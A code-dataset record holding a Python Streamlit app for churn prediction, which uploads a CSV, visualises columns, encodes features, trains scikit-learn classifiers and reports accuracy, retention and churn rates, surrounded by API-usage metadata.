{"api_name": "dash_html_components.Div", "line_number": 64, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 64, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 70, "usage_type": "call"}, {"api_name": "dash_extensions.Download", "line_number": 70, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 75, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 88, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 98, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 98, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 103, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 107, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 107, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Checklist", "line_number": 113, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 121, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 121, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 121, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 123, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 133, "usage_type": "call"}, {"api_name": "collections.OrderedDict.fromkeys", "line_number": 139, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 139, "usage_type": "name"}, {"api_name": "dash_html_components.Div", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_core_components.RangeSlider", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 149, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Spinner", "line_number": 149, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 150, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 150, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 153, "usage_type": "call"}, {"api_name": "dash_core_components.Store", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 154, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 157, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 161, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 161, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 161, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 162, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Spinner", "line_number": 162, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 162, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 168, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 185, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 219, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 219, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 220, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 220, "usage_type": "name"}]} +{"seq_id": "9268974671", "text": "import plotly.graph_objects as go\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import cross_validate\nimport base64\nfrom pathlib import Path\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nimport plotly.figure_factory as ff\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import learning_curve\nfrom sklearn.metrics import confusion_matrix, classification_report\nimport pickle\nfrom sklearn.model_selection import train_test_split\nimport time\nimport streamlit as st\nimport numpy as np\nimport pandas as pd\nimport plotly.express as px\nimport os\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use('Agg')\n\n# --------------------------------------------\n\n\n@st.cache\ndef load_data(uploaded):\n return pd.read_csv(uploaded)\n\n\ndef download_link(object_to_download, download_filename, download_link_text):\n \"\"\"\n Generates a link to download the given object_to_download.\n\n object_to_download (str, pd.DataFrame): The object to be downloaded.\n download_filename (str): filename and extension of file. e.g. mydata.csv, some_txt_output.txt\n download_link_text (str): Text to display for download link.\n\n Examples:\n download_link(YOUR_DF, 'YOUR_DF.csv', 'Click here to download data!')\n download_link(YOUR_STRING, 'YOUR_STRING.txt', 'Click here to download your text!')\n\n \"\"\"\n if isinstance(object_to_download, pd.DataFrame):\n object_to_download = object_to_download.to_csv(index=False)\n\n # some strings <-> bytes conversions necessary here\n b64 = base64.b64encode(object_to_download.encode()).decode()\n\n return f'{download_link_text}'\n\n\ndef customized_plot(type_of_plot, columns, data, target, bins=0):\n\n if type_of_plot == \"Scatter\":\n if len(columns) > 1 and len(columns) <= 2:\n fig = px.scatter(\n data, x=columns[0], y=columns[1], width=620, height=420, title=\"Evolution of \"+columns[0]+\" according to \" + columns[1])\n\n fig.update_layout(title_x=0.5, font_size=15)\n st.plotly_chart(fig)\n else:\n st.sidebar.error('Choose until 2 columns')\n\n if type_of_plot == \"Bar\":\n if len(columns) > 1 and len(columns) <= 2:\n fig = px.bar(data_frame=data, x=columns[0], y=columns[1],\n width=620, height=420, barmode=\"relative\")\n st.plotly_chart(fig)\n else:\n st.sidebar.error('Choose until 2 columns')\n\n if type_of_plot == \"Countplot\":\n fig, ax = plt.subplots()\n fig = plt.figure(figsize=(16, 9))\n ax = sns.countplot(x=columns, data=data, hue=target)\n st.pyplot(fig)\n\n fig2, ax2 = plt.subplots()\n ax2 = sns.heatmap(pd.crosstab(\n data[target], data[columns], normalize='columns'), annot=True)\n st.pyplot(fig2)\n\n if type_of_plot == \"Boxplot\":\n if len(columns) > 1:\n fig = px.box(data_frame=data, x=columns[0], y=columns[1])\n else:\n fig = px.box(data_frame=data, y=columns,\n width=620, height=420, orientation=\"v\")\n\n st.plotly_chart(fig)\n\n if type_of_plot == \"Histogram\":\n fig = px.histogram(data_frame=data, x=columns,\n nbins=int(bins), width=620, height=420, title=\"Distribution of \"+columns)\n fig.update_layout(title_x=0.5, font_size=15)\n st.plotly_chart(fig)\n\n if type_of_plot == \"Distribution\":\n if target not in columns:\n st.subheader(\"distribution curve\")\n for col in columns:\n if str(data[col].dtypes) == 'object':\n st.text(\n \"Can't display the distribution plot of a categorical variable\")\n else:\n fig, ax = plt.subplots()\n fig = plt.figure(figsize=(12, 8))\n ax = plt.axvline(x=data[col].quantile(\n q=0.25), c='C1', linestyle=':')\n ax = plt.axvline(x=data[col].quantile(\n q=0.75), c='C1', linestyle=':')\n ax = plt.axvline(x=data[col].mean(), c='C1')\n ax = plt.axvline(\n x=data[col].median(), c='C1', linestyle='--')\n\n ax = plt.hist(data[col], bins=100,\n histtype='step', density=True)\n ax = data[col].plot.density(bw_method=0.5)\n\n plt.legend()\n st.pyplot(fig)\n else:\n st.subheader(\"distribution curve between target and variable\")\n for col in columns:\n if str(data[col].dtypes) == 'object':\n st.text(\n \"Can't display the distribution plot of a categorical variable\")\n else:\n fig, ax = plt.subplots()\n fig = plt.figure(figsize=(16, 9))\n ax = sns.distplot(\n data[data[target] == 1][col], label=\"Exited\")\n ax = sns.distplot(\n data[data[target] == 0][col], label=\"Stayed\")\n plt.legend()\n st.pyplot(fig)\n\n\ndef target_info(data, target):\n st.text('Value Counts By Target/Class')\n st.write(data[target].value_counts(normalize=True))\n st.write(data.iloc[:, -1].value_counts().plot.pie())\n\n fig = go.Figure(\n data=[go.Pie(labels=['Stayed', 'Exited'], values=data[target].value_counts())])\n\n fig.update_layout(title='Statistic of '+target, title_x=0.5, font_size=20)\n st.plotly_chart(fig)\n\n return data[target].value_counts(normalize=True)\n\n\ndef core(data, features, target, model, cv, length):\n\n data = data.dropna()\n features = data.columns.to_list()\n trainset, testset = train_test_split(\n data, train_size=length, random_state=0)\n X_train, y_train = preprocessing(trainset, target)\n \"Train size\", y_train.value_counts()\n X_test, y_test = preprocessing(testset, target)\n \"Test size\", y_test.value_counts()\n\n evaluation(model, X_train, y_train, X_test, y_test, cv)\n\n predictions = model.predict(X_test)\n predictions_p = model.predict_proba(X_test)\n accuracy = accuracy_score(y_test, predictions)\n f_score = f1_score(y_test, predictions, average=\"macro\")\n p = precision_score(y_test, predictions, average=\"macro\")\n r = recall_score(y_test, predictions, average=\"macro\")\n ras = roc_auc_score(y_test, predictions_p[:, 1])\n accuracy_cv = 0\n if cv > 0:\n scores = cross_validate(model, data[features], data[target], cv=cv)\n accuracy_cv = np.mean(scores[\"test_score\"])\n return predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, testset\n\n\ndef view(data, target, length, predictions, predictions_p, y_test):\n data_t = pd.DataFrame({\"actual\": y_test,\n \"predictions\": predictions,\n \"predictions_proba\": predictions_p[:, 1]})\n st.write(data_t)\n st.markdown(\"\"\"\n
The column \"predictions_proba\" allows to determine the probability of success of the predicted value compared to 1.
\n \"\"\",\n unsafe_allow_html=True)\n\n labels = ['actual_1', 'predictions_1', 'actual_0', 'predictions_0']\n values = [len(data_t.loc[data_t[\"actual\"] == 1, \"actual\"]), len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"]),\n len(data_t.loc[data_t[\"actual\"] == 0, \"actual\"]), len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])]\n\n fig = px.bar(x=labels, y=values, width=620, height=420,\n title=\"Actual and Predicted values of 0 and 1\")\n fig.update_xaxes(title_text='values')\n fig.update_yaxes(title_text='number of values ​​present')\n st.plotly_chart(fig)\n return data_t\n\n\ndef main_content():\n st.markdown(\"\"\"\n

Churn Prediction App

\n \"\"\", unsafe_allow_html=True)\n\n st.markdown(\"\"\"\n Hello :smiley:. You can see the project here--> Link and the notebook here\n \"\"\",\n unsafe_allow_html=True)\n\n st.sidebar.markdown(\"\"\"\n

Navigation

\n \"\"\",\n unsafe_allow_html=True)\n\n # separateur = st.sidebar.selectbox(\"Choose a separator\", [',', ';'])\n uploaded = st.sidebar.file_uploader(\"upload\", type='csv')\n\n if uploaded:\n data = load_data(uploaded)\n st.sidebar.write(data.shape)\n if data.shape[0] > 5000:\n reducer = st.sidebar.slider(\n \"Randomly reduce data size %\", min_value=0.2, max_value=0.9, value=0.5)\n reduction = data.shape[0]*reducer\n data = data.sample(int(reduction))\n st.sidebar.write(data.shape)\n st.sidebar.markdown(\"\"\"\n

Frame

\n \"\"\",\n unsafe_allow_html=True)\n\n if st.sidebar.button('Display Dataframe'):\n \"Raw Data\", data.head(10)\n\n if st.sidebar.button('Some Statistics'):\n st.write(data.describe())\n\n target = st.sidebar.selectbox(\n 'Choose the Target Variable : ', data.columns)\n if len(data[target].unique()) > 2:\n st.sidebar.warning(\"This variable have too much unique value\")\n good_target = False\n elif data.dtypes[target] == 'object':\n st.sidebar.write(data[target].unique())\n st.sidebar.write(\n \"This target Variable don't have numeric variable. Let's change it:\")\n input1 = st.sidebar.text_input(\n f\"Change {data[target].unique()[0]} into : \")\n input2 = st.sidebar.text_input(\n f\"Change {data[target].unique()[1]} into : \")\n if st.sidebar.button(\"submit\"):\n data[target] = data[target].map(\n {data[target].unique()[0]: int(input1), data[target].unique()[1]: int(input2)})\n st.write(data)\n target_balance = target_info(data, target)\n good_target = True\n\n try:\n data[target] = data[target].map(\n {data[target].unique()[0]: int(input1), data[target].unique()[1]: int(input2)})\n except:\n st.write(\"error !!!!\")\n\n else:\n st.sidebar.info(\"We are good to go :smiley:\")\n target_balance = target_info(data, target)\n good_target = True\n\n st.sidebar.markdown(\"\"\"\n

Visualizing

\n \"\"\",\n unsafe_allow_html=True)\n type_of_plot = st.sidebar.selectbox(\"Select a type of plot\", [\n \"Distribution\", \"Bar\", \"Histogram\", \"Boxplot\", \"Scatter\", \"Countplot\"])\n if type_of_plot == \"Histogram\":\n bins = st.sidebar.number_input(\"Enter bins number : \")\n selected_columns_names = st.sidebar.selectbox(\n \"Select a colomn\", data.columns.tolist())\n\n elif type_of_plot == 'Countplot':\n selected_columns_names = st.sidebar.selectbox(\n \"Select one column :\", data.select_dtypes('object').columns)\n\n else:\n selected_columns_names = st.sidebar.multiselect(\n \"Select columns\", data.columns.tolist())\n\n if st.sidebar.button('Generate Plot'):\n st.success(\n f\"Generating {type_of_plot} for {selected_columns_names}\")\n customized_plot(type_of_plot, selected_columns_names,\n data, target, bins=0)\n\n st.sidebar.markdown(\"\"\"\n

Preprocessing

\n \"\"\",\n unsafe_allow_html=True)\n\n # if st.sidebar.checkbox(\"Check null values\"):\n # st.write(data.isna().sum())\n # null_vals = [i for i in data.isna().sum()]\n # if np.sum(null_vals) != 0:\n # st.write(\n # f\"There is {np.sum(null_vals)} null values\")\n # choice = st.sidebar.selectbox(\"How do you want to remove NaN values?\", [\n # 'Choose an option', 'Dropna', 'Replace by Mean', 'Drop Columns with NaN'])\n # missing_val_count_by_column = (data.isnull().sum())\n # col_with_NaN = missing_val_count_by_column[missing_val_count_by_column > 0].index.to_list(\n # )\n\n # data = deal_with_NaN(data, choice, col_with_NaN)\n # else:\n # st.write(\"Hum !! You are Lucky :smiley:\")\n\n features = st.sidebar.multiselect(\n \"Features\", data.drop(target, axis=1).columns)\n\n if features:\n data = data[features + [target]]\n\n cat_variable = data.select_dtypes(\n 'object').columns.to_list()\n\n if len(cat_variable) != 0:\n for cat in cat_variable:\n if len(data[cat].unique()) > 50:\n st.sidebar.warning(\n \"Too much unique values in \"+cat+\". OneHotEncoding may take a long time !!\")\n cat_encoder = False\n st.sidebar.write(f\"{cat_variable} are categorical data\")\n choice = st.sidebar.selectbox(f\"Would you like to create dummies for them ?\", [\n 'Choose an options', 'OneHotEncoding', 'LabelEncoding'])\n\n if choice == 'OneHotEncoding':\n try:\n data = pd.get_dummies(\n data=data, columns=cat_variable, drop_first=True)\n st.write(data)\n cat_encoder = True\n except:\n st.sidebar.write('Choose only one option')\n elif choice == 'LabelEncoding':\n try:\n encoder = LabelEncoder()\n for col in cat_variable:\n data[col] = encoder.fit_transform(data[col])\n cat_encoder = True\n st.write(data)\n except:\n st.sidebar.write('Choose only one option')\n else:\n st.sidebar.warning(\"You have to choose an option\")\n else:\n cat_encoder = True\n\n st.sidebar.markdown(\"\"\"\n

Modeling

\n \"\"\",\n unsafe_allow_html=True)\n length = st.sidebar.slider(\n \"Train size\", min_value=0.1, max_value=0.9, value=0.8)\n\n cv = st.sidebar.selectbox(\n \"Cross Validation on the train\",\n [0, 5, 10, 15, 20])\n\n model = st.sidebar.selectbox(\n \"Which model do you like!\",\n [\"Decision Tree\",\n \"Random Forest\",\n \"KnnClassifier\",\n \"Logistic Regression\",\n # \"SgdClassifier\",\n \"SVClassification\",\n ])\n if model == \"Decision Tree\":\n params = [\"criterion\", \"max_depth\", \"max_features\",\n \"min_samples_leaf\", \"min_samples_split\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n criterion, max_depth, max_features, min_samples_leaf, min_samples_split = \"gini\", None, None, 1, 2\n for p in range(len(params)):\n if check_param[p] and params[p] == \"criterion\":\n criterion = st.sidebar.selectbox(\n \"enter criterion value\",\n [\"gini\", \"entropy\"]\n )\n if check_param[p] and params[p] == \"max_depth\":\n max_depth = st.sidebar.selectbox(\n \"enter max_depth value\",\n [None, 2, 5, 10, 15]\n )\n if check_param[p] and params[p] == \"max_features\":\n max_features = st.sidebar.selectbox(\n \"enter max_features value\",\n [None, \"auto\", \"sqrt\", \"log2\"]\n )\n if check_param[p] and params[p] == \"min_samples_leaf\":\n min_samples_leaf = st.sidebar.selectbox(\n \"enter min_samples_leaf value\",\n [1, 5, 8, 12]\n )\n if check_param[p] and params[p] == \"min_samples_split\":\n min_samples_split = st.sidebar.selectbox(\n \"enter min_samples_split value\",\n [2, 3, 5, 8]\n )\n if st.sidebar.button(\"Predicting\"):\n dt = DecisionTreeClassifier(random_state=0, criterion=criterion, max_depth=max_depth,\n max_features=max_features, min_samples_leaf=min_samples_leaf, min_samples_split=min_samples_split)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, dt, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n

Differents metrics

\n \"\"\",\n unsafe_allow_html=True)\n st.table(tab)\n\n st.markdown(\"\"\"\n

Calcul of your retention and churn rate

\n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(\n pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n if model == \"Random Forest\":\n params = [\"n_estimators\", \"criterion\", \"max_depth\",\n \"max_features\", \"min_samples_leaf\", \"min_samples_split\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n n_estimators, criterion, max_depth, max_features, min_samples_leaf, min_samples_split = 100, \"gini\", None, None, 1, 2\n for p in range(len(params)):\n if check_param[p] and params[p] == \"n_estimators\":\n n_estimators = st.sidebar.selectbox(\n \"enter n_estimators value\",\n [100, 4, 6, 9]\n )\n if check_param[p] and params[p] == \"criterion\":\n criterion = st.sidebar.selectbox(\n \"enter criterion value\",\n [\"gini\", \"entropy\"]\n )\n if check_param[p] and params[p] == \"max_depth\":\n max_depth = st.sidebar.selectbox(\n \"enter max_depth value\",\n [None, 2, 5, 10, 15]\n )\n if check_param[p] and params[p] == \"max_features\":\n max_features = st.sidebar.selectbox(\n \"enter max_features value\",\n [None, \"auto\", \"sqrt\", \"log2\"]\n )\n if check_param[p] and params[p] == \"min_samples_leaf\":\n min_samples_leaf = st.sidebar.selectbox(\n \"enter min_samples_leaf value\",\n [1, 5, 8, 12]\n )\n if check_param[p] and params[p] == \"min_samples_split\":\n min_samples_split = st.sidebar.selectbox(\n \"enter min_samples_split value\",\n [2, 3, 5, 8]\n )\n if st.sidebar.button(\"Predicting\"):\n rf = RandomForestClassifier(random_state=0, n_estimators=n_estimators, criterion=criterion, max_depth=max_depth,\n max_features=max_features, min_samples_leaf=min_samples_leaf, min_samples_split=min_samples_split)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, rf, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n

Differents metrics

\n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n

Calcul of your retention and churn rate

\n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(\n pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n if model == \"KnnClassifier\":\n params = [\"n_neighbors\", \"weights\", \"algorithm\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n n_neighbors, weights, algorithm = 5, \"uniform\", \"auto\"\n for p in range(len(params)):\n if check_param[p] and params[p] == \"n_neighbors\":\n n_neighbors = st.sidebar.selectbox(\n \"enter n_neighbors value\",\n [5, 10, 15, 20, 25]\n )\n if check_param[p] and params[p] == \"weights\":\n weights = st.sidebar.selectbox(\n \"enter weights value\",\n [\"uniform\", \"distance\"]\n )\n if check_param[p] and params[p] == \"algorithm\":\n algorithm = st.sidebar.selectbox(\n \"enter algorithm value\",\n [\"auto\", \"ball_tree\", \"kd_tree\", \"brute\"]\n )\n if st.sidebar.button(\"Predicting\"):\n knn = KNeighborsClassifier(\n n_neighbors=n_neighbors, weights=weights, algorithm=algorithm)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, knn, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n

Differents metrics

\n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n

Calcul of your retention and churn rate

\n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(\n pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n if model == \"Logistic Regression\":\n params = [\"penalty\", \"solver\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n penalty, solver = \"l2\", \"lbfgs\"\n for p in range(len(params)):\n if check_param[p] and params[p] == \"penalty\":\n penalty = st.sidebar.selectbox(\n \"enter penalty value\",\n [\"l2\", \"l1\", \"elasticnet\", \"none\"]\n )\n if check_param[p] and params[p] == \"solver\":\n solver = st.sidebar.selectbox(\n \"enter solver value\",\n [\"lbfgs\", \"newton-cg\", \"liblinear\", \"sag\", \"saga\"]\n )\n try:\n if penalty == \"l1\" and solver in ['newton-cg', 'sag', 'lbfgs']:\n st.error(\"L1 don't work with \" + solver +\n \". But, it work well with 'liblinear' and 'saga' \")\n if penalty == 'elasticnet' and solver != 'saga':\n st.error(\"elasticnet don't work with \" +\n solver + \". But it work well with saga.\")\n else:\n\n if st.sidebar.button(\"Predicting\"):\n lr = LogisticRegression(\n random_state=0, penalty=penalty, solver=solver)\n if not features:\n st.write(\n \"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, lr, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n

Differents metrics

\n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n

Calcul of your retention and churn rate

\n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(pd.concat([X_test.drop(\n columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n except:\n st.warning(\"Choose another solver or another penalty\")\n\n if model == \"SVClassification\":\n params = [\"kernel\", \"degree\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n kernel, degree = \"rbf\", 3\n for p in range(len(params)):\n if check_param[p] and params[p] == \"kernel\":\n kernel = st.sidebar.selectbox(\n \"enter kernel value\",\n [\"rbf\", \"poly\", \"sigmoid\", \"precomputed\"]\n )\n if check_param[p] and params[p] == \"degree\":\n degree = st.sidebar.selectbox(\n \"enter degree value\",\n [3, 6, 9]\n )\n if st.sidebar.button(\"Predicting\"):\n sv = SVC(random_state=0, kernel=kernel,\n degree=degree, probability=True)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, sv, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n

Differents metrics

\n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n

Calcul of your retention and churn rate

\n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n st.sidebar.markdown(download_link(\n pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n\ndef deal_with_NaN(data, choice, col_with_NaN):\n if choice == \"Dropna\":\n data = data.dropna(axis=0)\n st.write(data.isna().sum())\n return data\n\n if choice == \"Replace by Mean\":\n imputer = SimpleImputer(strategy='mean')\n Imputed_data = pd.DataFrame(imputer.fit_transform(data))\n Imputed_data = data.columns\n return Imputed_data\n\n if choice == \"Drop Columns with NaN\":\n return data.drop(columns=col_with_NaN)\n\n\ndef preprocessing(data, target):\n X = data.drop(target, axis=1)\n y = data[target]\n\n return X, y\n\n\ndef evaluation(model, X_train, y_train, X_test, y_test, cv):\n model.fit(X_train, y_train)\n ypred = model.predict(X_test)\n st.write(\"Correlation Matrix\")\n st.write(confusion_matrix(y_test, ypred))\n\n N, train_scores, test_scores = learning_curve(model, X_train, y_train, train_sizes=np.linspace(0.1, 1, 10),\n cv=10)\n\n fig = plt.subplots()\n fig = plt.figure(figsize=(12, 8))\n ax = plt.plot(N, train_scores.mean(axis=1), label='train score')\n ax = plt.plot(N, test_scores.mean(axis=1), label='test score')\n ax = plt.title(\n \"Learning curve for accuracy: This show us if the model overfit\")\n plt.legend()\n st.pyplot(fig)\n\n return model\n\n\ndef main():\n \"\"\"Common Machine Learning EDA\"\"\"\n\n main_content()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "badou11/streamlit_for_churn", "sub_path": "churnapp.py", "file_name": "churnapp.py", "file_ext": "py", "file_size_in_byte": 36529, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.use", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 37, "usage_type": "call"}, {"api_name": "streamlit.cache", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 53, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 57, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 66, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 66, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 70, "usage_type": "call"}, {"api_name": "streamlit.sidebar.error", "line_number": 72, "usage_type": "call"}, 